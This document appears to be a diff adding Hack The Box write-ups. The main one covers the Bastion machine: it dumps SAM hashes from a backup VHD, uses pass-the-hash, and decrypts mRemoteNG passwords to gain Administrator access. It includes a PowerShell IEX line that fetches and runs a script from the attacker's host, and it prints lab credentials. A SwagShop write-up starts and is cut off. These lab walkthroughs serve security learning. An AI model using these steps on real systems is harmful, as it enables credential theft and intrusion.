+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 atsvc
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-344-0
+ fr--r--r-- 4 Sun Dec 31 23:58:45 1600 wkssvc
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 spoolss
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-5e0-0
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 trkwks
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 W32TIME_ALT
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 openssh-ssh-agent
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 vgauth-service
+ fr--r--r-- 4 Sun Dec 31 23:58:45 1600 srvsvc
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-5a4-0
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-250-0
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-248-0
+ IPC$ READ ONLY Remote IPC
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/mount]
+ → ls
+ note.txt SDT65CB.tmp vXVtBOoZjY WindowsImageBackup
+
+
+The interesting thing to see here is that using smbmap it makes the directory named "vXVtBOoZjY" appear. Earlier the note.txt said that this was a massive share for their office's slow VPN, let's check the size using the **du** command.
+
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/mount]
+ → ls
+ note.txt SDT65CB.tmp vXVtBOoZjY WindowsImageBackup
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/mount]
+ → du -hs WindowsImageBackup
+ 5.1G WindowsImageBackup
+
+
+5.1 Gigs is quite alot indeed, now navigating into WindowsImageBackup we see the folder named 'L4mpje-PC'
+
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/mount]
+ → cd WindowsImageBackup
+
+ λ root [ 10.10.14.15/23 ] [Bastion/mount/WindowsImageBackup]
+ → cd L4mpje-PC
+
+ λ root [ 10.10.14.15/23 ] [mount/WindowsImageBackup/L4mpje-PC]
+ → ls
+ 'Backup 2019-02-22 124351' Catalog MediaId SPPMetadataCache
+
+
+The backup folder seems interesting, let's see what we can get in there.
+
+
+ λ root [ 10.10.14.15/23 ] [mount/WindowsImageBackup/L4mpje-PC]
+ → cd Backup\ 2019-02-22\ 124351
+
+ λ root [ 10.10.14.15/23 ] [WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
+ → du -hs *
+ 37M 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
+ 5.1G 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
+ 4.0K BackupSpecs.xml
+ 4.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
+ 12K cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
+ 8.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
+ 4.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
+ 4.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
+ 4.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
+ 4.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
+ 4.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
+ 8.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
+ 2.3M cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
+
+
+
+Right here we see two interesting .vhd harddrives one weighing 37 Megs and the other one weighing 5.1Gigs From there, we will need to mount the virtual harddrives (VHD), to do so we will use the guestmount command
+
+
+ λ root [ 10.10.14.15/23 ] [WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
+ → guestmount
+ zsh: command not found: guestmount
+
+ λ root [ 10.10.14.15/23 ] [WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
+ → apt install libguestfs-tools && guestmount --help
+
+
+Once it's done installing, run the following command :
+
+
+ λ root [ 10.10.14.15/23 ] [WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
+ → mkdir /home/nihilist/_HTB/Bastion/vhd
+
+ λ root [ 10.10.14.15/23 ] [WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
+ → guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /home/nihilist/_HTB/Bastion/vhd
+
+
+once it's done mounting, let's browse into the vhd directory we just created, and view the contents of the mounted virtual harddrive
+
+
+ λ root [ 10.10.14.15/23 ] [WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
+ → cd /home/nihilist/_HTB/Bastion
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → cd vhd
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/vhd]
+ → ls
+ '$Recycle.Bin' config.sys pagefile.sys ProgramData Recovery Users
+ autoexec.bat 'Documents and Settings' PerfLogs 'Program Files' 'System Volume Information' Windows
+
+ λ root [ 10.10.14.15/23 ] [vhd/Users/L4mpje]
+ → find Desktop Documents Downloads -ls
+ 25 0 drwxrwxrwx 1 root root 0 Feb 22 2019 Desktop
+ 49 1 -rwxrwxrwx 1 root root 282 Feb 22 2019 Desktop/desktop.ini
+ 26 4 drwxrwxrwx 1 root root 4096 Feb 22 2019 Documents
+ 50 1 -rwxrwxrwx 1 root root 402 Feb 22 2019 Documents/desktop.ini
+ 51 0 lrwxrwxrwx 2 root root 27 Feb 22 2019 Documents/My\ Music -> /sysroot/Users/L4mpje/Music
+ 52 0 lrwxrwxrwx 2 root root 30 Feb 22 2019 Documents/My\ Pictures -> /sysroot/Users/L4mpje/Pictures
+ 53 0 lrwxrwxrwx 2 root root 28 Feb 22 2019 Documents/My\ Videos -> /sysroot/Users/L4mpje/Videos
+ 27 0 drwxrwxrwx 1 root root 0 Feb 22 2019 Downloads
+ 54 1 -rwxrwxrwx 1 root root 282 Feb 22 2019 Downloads/desktop.ini
+
+
+
+nothing too interesting there, let's check out the Windows/System32/config/ folder.
+
+
+ λ root [ 10.10.14.15/23 ] [vhd/Users/L4mpje]
+ → cd ../..
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/vhd]
+ → cd Windows/System32/config
+
+ λ root [ 10.10.14.15/23 ] [Windows/System32/config]
+ → ls
+ BCD-Template SAM
+ BCD-Template.LOG SAM.LOG
+ COMPONENTS SAM.LOG1
+ COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms SAM.LOG2
+ COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms SECURITY
+ COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms SECURITY.LOG
+ COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf SECURITY.LOG1
+ COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf SECURITY.LOG2
+ COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms SOFTWARE
+ COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms SOFTWARE.LOG
+ COMPONENTS.LOG SOFTWARE.LOG1
+ COMPONENTS.LOG1 SOFTWARE.LOG2
+ COMPONENTS.LOG2 SYSTEM
+ DEFAULT SYSTEM.LOG
+ DEFAULT.LOG SYSTEM.LOG1
+ DEFAULT.LOG1 SYSTEM.LOG2
+ DEFAULT.LOG2 systemprofile
+ Journal TxR
+ RegBack
+
+
+let's copy the SAM and SYSTEM files locally.
+
+
+ λ root [ 10.10.14.15/23 ] [Windows/System32/config]
+ → cp SAM SYSTEM /home/nihilist/_HTB/Bastion
+
+ λ root [ 10.10.14.15/23 ] [Windows/System32/config]
+ → cd ../../../..
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → ls
+ mount note.txt SAM SYSTEM vhd
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → file SAM SYSTEM
+ SAM: MS Windows registry file, NT/2000 or above
+ SYSTEM: MS Windows registry file, NT/2000 or above
+
+
+
+Here we see that both these files are windows registry files, they may contain some interesting things. let's move them in another folder.
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → mkdir backup && mv SAM backup/ && mv SYSTEM backup/
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → cd backup
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/backup]
+ → ls
+ SAM SYSTEM
+
+
+from there we'll use the impacket-secretsdump command :
+
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/backup]
+ → impacket-secretsdump -sam SAM -system SYSTEM local
+ Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
+
+ [*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
+ [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
+ Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+ Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+ L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
+ [*] Cleaning up...
+
+
+And we have a few hashes, the administrator hash is blank (31d6 means nothing) so it probably means that the administrator account is disabled. Let's focus on the L4mpje user instead, we'll use the smbmap command once again, setting the -u (user) and -p (hash) -H (host) flags
+
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/backup]
+ → smbmap -u L4mpje -p aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134
+ [+] Finding open SMB ports....
+ [+] Hash detected, using pass-the-hash to authenticate
+ [+] User session established on 10.10.10.134...
+ [+] IP: 10.10.10.134:445 Name: 10.10.10.134
+ Disk Permissions Comment
+ ---- ----------- -------
+ ADMIN$ NO ACCESS Remote Admin
+ Backups READ, WRITE
+ C$ NO ACCESS Default share
+
+
+Looking at the results, we don't seem to have gained preety much anything, instead let's check out the ssh port that our nmap scan discovered earlier. In order to do so, we didn't find our password yet, we'll use the hash on https://hashes.org/search.php to see if it can guess it for us.
+
+ 
+
+looking at the results, we seem to have credentials ! L4mpje:bureaulampje , now let's try to login as the user L4mpje through ssh.
+
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/backup]
+ → ssh L4mpje@10.10.10.134
+ The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
+ ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.
+ L4mpje@10.10.10.134's password:
+
+ Microsoft Windows [Version 10.0.14393]
+ (c) 2016 Microsoft Corporation. All rights reserved.
+
+ l4mpje@BASTION C:\Users\L4mpje>
+
+
+And we have user access to the box. let's print out the user flag.
+
+
+ l4mpje@BASTION C:\Users\L4mpje>cd Desktop
+
+ l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 0CB3-C487
+
+ Directory of C:\Users\L4mpje\Desktop
+
+ 22-02-2019 15:27 <****DIR> .
+ 22-02-2019 15:27 <****DIR> ..
+ 23-02-2019 09:07 32 user.txt
+ 1 File(s) 32 bytes
+ 2 Dir(s) 11.298.652.160 bytes free
+
+ l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
+ 9bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! We have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now to escalate privileges on the box we need to do a few things :
+
+
+ l4mpje@BASTION C:\Users\L4mpje>net localgroup administrators
+ Alias name administrators
+ Comment Administrators have complete and unrestricted access to the computer/domain
+
+ Members
+
+ -------------------------------------------------------------------------------
+ Administrator
+ The command completed successfully.
+
+
+Looking at the results of the **net localgroup administrators** command, we see that the user "Administrator" is there, even though we thought that he was disabled before. Let's run the net user command on our own user l4mpje to see which groups we are part of.
+
+
+ l4mpje@BASTION C:\Users\L4mpje>net user l4mpje
+ User name L4mpje
+ Full Name L4mpje
+ Comment
+ User's comment
+ Country/region code 000 (System Default)
+ Account active Yes
+ Account expires Never
+
+ Password last set 22-2-2019 13:42:58
+ Password expires Never
+ Password changeable 22-2-2019 13:42:58
+ Password required Yes
+ User may change password No
+
+ Workstations allowed All
+ Logon script
+ User profile
+ Home directory
+ Last logon 12-2-2020 20:31:20
+
+ Logon hours allowed All
+
+ Local Group Memberships *Users
+ Global Group memberships *None
+ The command completed successfully.
+
+
+so here it says that our local group membership is with ***Users**. Running the same command on the Administrator user we see that
+
+
+ l4mpje@BASTION C:\Users\L4mpje>net user Administrator
+ User name Administrator
+ Full Name
+ Comment Built-in account for administering the computer/domain
+ User's comment
+ Country/region code 000 (System Default)
+ Account active Yes
+ Account expires Never
+
+ Password last set 16-4-2019 11:00:56
+ Password expires Never
+ Password changeable 16-4-2019 11:00:56
+ Password required Yes
+ User may change password Yes
+
+ Workstations allowed All
+ Logon script
+ User profile
+ Home directory
+ Last logon 27-8-2019 10:18:29
+
+ Logon hours allowed All
+
+ Local Group Memberships *Administrators
+ Global Group memberships *None
+ The command completed successfully.
+
+
+here we see that the administrator user has his password last set on **16-4-2019 11:00:56**
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → cd vhd
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/vhd]
+ → ls
+ '$Recycle.Bin' config.sys pagefile.sys ProgramData Recovery Users
+ autoexec.bat 'Documents and Settings' PerfLogs 'Program Files' 'System Volume Information' Windows
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/vhd]
+ → cd Windows/System32/config
+
+ λ root [ 10.10.14.15/23 ] [Windows/System32/config]
+ → ls -lash | grep SAM
+ 256K -rwxrwxrwx 1 root root 256K Feb 22 2019 SAM
+ 4.0K -rwxrwxrwx 1 root root 1.0K Apr 12 2011 SAM.LOG
+ 24K -rwxrwxrwx 2 root root 21K Feb 22 2019 SAM.LOG1
+ 0 -rwxrwxrwx 2 root root 0 Jul 14 2009 SAM.LOG2
+
+ λ root [ 10.10.14.15/23 ] [Windows/System32/config]
+ → ls -lash | grep SYSTEM
+ 9.3M -rwxrwxrwx 1 root root 9.3M Feb 22 2019 SYSTEM
+ 4.0K -rwxrwxrwx 1 root root 1.0K Apr 12 2011 SYSTEM.LOG
+ 3.5M -rwxrwxrwx 2 root root 256K Feb 22 2019 SYSTEM.LOG1
+ 0 -rwxrwxrwx 2 root root 0 Jul 14 2009 SYSTEM.LOG2
+
+
+
+
+From there we see that the SAM and SYSTEM registry files were last modified Febuary 22nd, so that's why we weren't able to see the administrator account before. Now in order to privesc, we will use a tool called JAWS which is a windows enumerating script
+
+
+ λ root [ 10.10.14.15/23 ] [Windows/System32/config]
+ → cd ../../..
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/vhd]
+ → cd ..
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → curl -sk https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1 > jaws-enum.ps1
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → ifconfig | grep inet
+ inet 192.168.0.19 netmask 255.255.255.0 broadcast 192.168.0.255
+ inet6 fe80::82fa:5bff:fe5b:4334 prefixlen 64 scopeid 0x20
+ inet 127.0.0.1 netmask 255.0.0.0
+ inet6 ::1 prefixlen 128 scopeid 0x10
+ inet 10.10.14.15 netmask 255.255.254.0 destination 10.10.14.15
+ inet6 dead:beef:2::100d prefixlen 64 scopeid 0x0
+ inet6 fe80::f96c:5ab:2911:51b prefixlen 64 scopeid 0x20
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+We will download the script (jaws-enum.ps1) at our ip (10.10.14.15) at the correct port (8080) onto the box.
+
+
+ l4mpje@BASTION C:\Users\L4mpje>IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15:8080/jaws-enum.ps1')
+ 'IEX' is not recognized as an internal or external command,
+ operable program or batch file.
+
+
+let's not forget that we'll use powershell to run that command :)
+
+
+ l4mpje@BASTION C:\Users\L4mpje>powershell
+ Windows PowerShell
+ Copyright (C) 2016 Microsoft Corporation. All rights reserved.
+
+ PS C:\Users\L4mpje> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15:8080/jaws-enum.ps1')
+
+ Running J.A.W.S. Enumeration
+
+
+while that runs let's run another ssh session to see what we can find
+
+
+ Microsoft Windows [Version 10.0.14393]
+ (c) 2016 Microsoft Corporation. All rights reserved.
+
+ l4mpje@BASTION C:\Users\L4mpje>cd ../..
+
+ l4mpje@BASTION C:\>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 0CB3-C487
+
+ Directory of C:\
+
+ 12-02-2020 20:22 <****DIR> Backups
+ 12-09-2016 12:35 <****DIR> Logs
+ 22-02-2019 14:42 <****DIR> PerfLogs
+ 27-08-2019 10:20 <****DIR> Program Files
+ 22-02-2019 14:01 <****DIR> Program Files (x86)
+ 22-02-2019 13:50 <****DIR> Users
+ 12-02-2020 19:07 <****DIR> Windows
+ 0 File(s) 0 bytes
+ 7 Dir(s) 11.297.501.184 bytes free
+
+ l4mpje@BASTION C:\>cd Program Files (x86)
+
+ l4mpje@BASTION C:\Program Files (x86)>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 0CB3-C487
+
+ Directory of C:\Program Files (x86)
+
+ 22-02-2019 14:01 <****DIR> .
+ 22-02-2019 14:01 <****DIR> ..
+ 16-07-2016 14:23 <****DIR> Common Files
+ 23-02-2019 09:38 <****DIR> Internet Explorer
+ 16-07-2016 14:23 <****DIR> Microsoft.NET
+ 22-02-2019 14:01 <****DIR> mRemoteNG
+ 23-02-2019 10:22 <****DIR> Windows Defender
+ 23-02-2019 09:38 <****DIR> Windows Mail
+ 23-02-2019 10:22 <****DIR> Windows Media Player
+ 16-07-2016 14:23 <****DIR> Windows Multimedia Platform
+ 16-07-2016 14:23 <****DIR> Windows NT
+ 23-02-2019 10:22 <****DIR> Windows Photo Viewer
+ 16-07-2016 14:23 <****DIR> Windows Portable Devices
+ 16-07-2016 14:23 <****DIR> WindowsPowerShell
+ 0 File(s) 0 bytes
+ 14 Dir(s) 11.297.501.184 bytes free
+
+looking at the program files(x86) folder we see something interesting here, the mRemoteNG which is an open source, tabbed, multi-protocol, remote connections manager. looking at this [article](http://hackersvanguard.com/mremoteng-insecure-password-storage/) made by hackersvanguard.com, we see that it is possible to decrypt passwords. However for this example we'll use another solution in order to remain within the linux environment, using a this [ python script](https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py)
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → curl -sk https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py > mremoteng.py
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → python3 mremoteng.py
+ usage: mremoteng.py [-h] [-f FILE | -s STRING] [-p PASSWORD]
+
+ Decrypt mRemoteNG passwords.
+
+ optional arguments:
+ -h, --help show this help message and exit
+ -f FILE, --file FILE name of file containing mRemoteNG password
+ -s STRING, --string STRING
+ base64 string of mRemoteNG password
+ -p PASSWORD, --password PASSWORD
+ Custom password
+
+
+using python3 to print out the help menu we see that we will have to setup a few flags : first of all we need the string of the encrypted mremoteng password, which according to the aforementioned blog post is located in the config file, so let's navigate there
+
+
+ PS C:\Users\L4mpje> cd \Users\L4mpje\Appdata\Roaming
+ PS C:\Users\L4mpje\Appdata\Roaming> dir
+
+
+ Directory: C:\Users\L4mpje\Appdata\Roaming
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 22-2-2019 13:50 Adobe
+ d---s- 22-2-2019 13:52 Microsoft
+ d----- 22-2-2019 14:03 mRemoteNG
+
+
+moving into mRemoteNG we print out the contents of confCons.xml
+
+
+ PS C:\Users\L4mpje\Appdata\Roaming> cd .\mRemoteNG\
+ PS C:\Users\L4mpje\Appdata\Roaming\mRemoteNG> dir
+
+
+ Directory: C:\Users\L4mpje\Appdata\Roaming\mRemoteNG
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 22-2-2019 14:01 Themes
+ -a---- 22-2-2019 14:03 6316 confCons.xml
+ -a---- 22-2-2019 14:02 6194 confCons.xml.20190222-1402277353.backup
+ -a---- 22-2-2019 14:02 6206 confCons.xml.20190222-1402339071.backup
+ -a---- 22-2-2019 14:02 6218 confCons.xml.20190222-1402379227.backup
+ -a---- 22-2-2019 14:02 6231 confCons.xml.20190222-1403070644.backup
+ -a---- 22-2-2019 14:03 6319 confCons.xml.20190222-1403100488.backup
+ -a---- 22-2-2019 14:03 6318 confCons.xml.20190222-1403220026.backup
+ -a---- 22-2-2019 14:03 6315 confCons.xml.20190222-1403261268.backup
+ -a---- 22-2-2019 14:03 6316 confCons.xml.20190222-1403272831.backup
+ -a---- 22-2-2019 14:03 6315 confCons.xml.20190222-1403433299.backup
+ -a---- 22-2-2019 14:03 6316 confCons.xml.20190222-1403486580.backup
+ -a---- 22-2-2019 14:03 51 extApps.xml
+ -a---- 22-2-2019 14:03 5217 mRemoteNG.log
+ -a---- 22-2-2019 14:03 2245 pnlLayout.xml
+
+
+ PS C:\Users\L4mpje\Appdata\Roaming\mRemoteNG> type confCons.xml
+ Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
+
+
+and there we have our encrypted password string ! let's try out the python script we just got to see if it can decrypt it.
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → python3 mremoteng.py -s yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB
+ Password: bureaulampje
+
+
+we already have that one, so we need to check for another one
+
+
+ Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
+
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → python3 mremoteng.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
+ Password: thXLHM96BeKL0ER2
+
+
+seems like we have a password for the Administrator user, let's see if we can SSH as the Administrator user.
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → ssh Administrator@10.10.10.134
+ Administrator@10.10.10.134's password:
+
+ Microsoft Windows [Version 10.0.14393]
+ (c) 2016 Microsoft Corporation. All rights reserved.
+
+ administrator@BASTION C:\Users\Administrator>whoami
+ bastion\administrator
+
+
+And there we go, we are logged in as Administrator ! all that's left to do is to print out the root flag.
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → ssh Administrator@10.10.10.134
+ Administrator@10.10.10.134's password:
+
+ Microsoft Windows [Version 10.0.14393]
+ (c) 2016 Microsoft Corporation. All rights reserved.
+
+ administrator@BASTION C:\Users\Administrator>whoami
+ bastion\administrator
+
+ administrator@BASTION C:\Users\Administrator>cd Desktop
+
+ administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
+ 95XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
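Review bot: the SSH transcript from `→ ssh Administrator@10.10.10.134` through `bastion\administrator` is pasted twice; the second copy is the complete one (it continues with `cd Desktop` and `type root.txt`), so drop the first block and keep one listing. The Conclusion section ends with "Here we can see the progress graph :" followed only by blank lines, so either add the image reference or remove the sentence. One sentence saying where `mremoteng.py` came from would help, since the hunk only says "the python script we just got", and the security point of this section deserves stating plainly: the password values in confCons.xml decrypt straight back to plaintext, so a readable copy of that file is equivalent to the credentials it holds.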
diff --git a/Easy/32.md b/Easy/32.md
new file mode 100644
index 0000000..6f85091
--- /dev/null
+++ b/Easy/32.md
@@ -0,0 +1,377 @@
+# SwagShop Writeup
+
+
+
+## Introduction :
+
+SwagShop is an easy Linux box that was released back in May 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → ping 10.10.10.140
+ PING 10.10.10.140 (10.10.10.140) 56(84) bytes of data.
+ 64 bytes from 10.10.10.140: icmp_seq=1 ttl=63 time=84.7 ms
+ 64 bytes from 10.10.10.140: icmp_seq=2 ttl=63 time=73.5 ms
+ 64 bytes from 10.10.10.140: icmp_seq=3 ttl=63 time=80.2 ms
+ ^C
+ --- 10.10.10.140 ping statistics ---
+ 3 packets transmitted, 3 received, 0% packet loss, time 2003ms
+ rtt min/avg/max/mdev = 73.461/79.465/84.723/4.627 ms
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -F 10.10.10.140
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-13 12:59 CET
+ Nmap scan report for 10.10.10.140
+ Host is up (0.078s latency).
+ Not shown: 98 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.53 seconds
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -sCV -p22,80 10.10.10.140
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-13 13:00 CET
+ Nmap scan report for 10.10.10.140
+ Host is up (0.080s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
+ | 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
+ |_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Home page
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 11.74 seconds
+
+
+
+
+## **Part 2 : Getting User Access**
+
+We see that our nmap scan picked up the 80th port, let's enumerate it using dirsearch.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → dirsearch -u http://10.10.10.140/ -e php,html,js,txt -x 403 -r
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, html, js, txt | HTTP method: get | Threads: 10 | Wordlist size: 7107 | Recursion level: 1
+
+ Error Log: /home/nihilist/.dirsearch/logs/errors-19-12-13_13-07-32.log
+
+ Target: http://10.10.10.140/
+
+ [13:07:32] Starting:
+
+
+While that runs in the background, we browse to it and see what we're dealing with.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/SwagShop ]
+ → curl -sk http://10.10.10.140 | grep Magento
+ <****address class="copyright">(C) 2014 Magento Demo Store. All Rights Reserved.<**/address>
+
+
+Seems like we have a Magento webserver to work with ! let's run a quick searchsploit command with the Magento command to see which exploits are publicly available for this service.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → searchsploit Magento
+ ------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------- ----------------------------------------
+ Magento 1.2 - '/app/code/core/Mage/A | exploits/php/webapps/32808.txt
+ Magento 1.2 - '/app/code/core/Mage/A | exploits/php/webapps/32809.txt
+ Magento 1.2 - 'downloader/index.php' | exploits/php/webapps/32810.txt
+ Magento < 2.0.6 - Arbitrary Unserial | exploits/php/webapps/39838.php
+ Magento CE < 1.9.0.1 - (Authenticate | exploits/php/webapps/37811.py
+ Magento Server MAGMI Plugin - Multip | exploits/php/webapps/35996.txt
+ Magento Server MAGMI Plugin 0.7.17a | exploits/php/webapps/35052.txt
+ Magento eCommerce - Local File Discl | exploits/php/webapps/19793.txt
